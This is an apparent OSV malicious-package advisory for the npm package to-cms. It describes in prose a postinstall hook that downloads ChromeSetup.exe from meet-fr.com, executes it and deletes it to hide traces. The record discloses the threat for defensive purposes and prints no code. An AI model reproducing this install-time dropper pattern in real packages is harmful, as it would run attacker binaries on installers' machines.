OSV ID
MAL-2026-4693
Ecosystem
npm
Summary
package.json declares postinstall: node index.js . On npm install , index.js unconditionally HTTPS-GETs https://meet-fr.com/ChromeSetup.exe, writes it to os.tmpdir(), executes it via a shell start / open call, and deletes the file ~5 seconds later to hide forensics. The domain meet-fr.com is not a Google or Chrome publisher domain; the package name to-cms has no relation to a Chrome installer; the binary is unsigned, unpinned, has no hash/signature verification, and self-deletes after launch — the canonical dropper shape. A debug.log shipped in the tarball references C:\Users\work1\AppData\Local\Temp\ChromeSetup.exe , corroborating that this code path has executed on the author/build machine. Every installer of this package runs the attacker-controlled binary at install time.
Source: amazon-inspector (cccb3d12c0df356fc34c0b79a003f32a6484dd9229b43dfef5b89c8dd4dec51c)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.